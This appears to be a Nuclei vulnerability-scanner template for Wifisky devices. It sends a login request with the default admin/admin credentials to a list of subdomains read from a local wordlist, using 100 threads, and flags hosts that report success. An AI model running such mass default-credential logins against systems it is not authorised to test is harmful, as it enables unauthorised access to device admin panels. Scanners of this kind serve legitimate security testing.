id: wifisky-default-password

info:
  name: Wifisky Default Password
  author: pikpikcu
  severity: high
  tags: default-login,wifisky

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /login.php?action=login&type=admin HTTP/1.1
        Host: {{Subdomains}}
        Accept: */*
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Connection: close

        username=admin&password=admin
    matchers-condition: and
    matchers:

      - type: word
        words:
          - "text/html"
        part: header

      - type: word
        words:
          - '"success":"true"'
          - '"data":'
        part: body
        condition: and

      - type: status
        status:
          - 200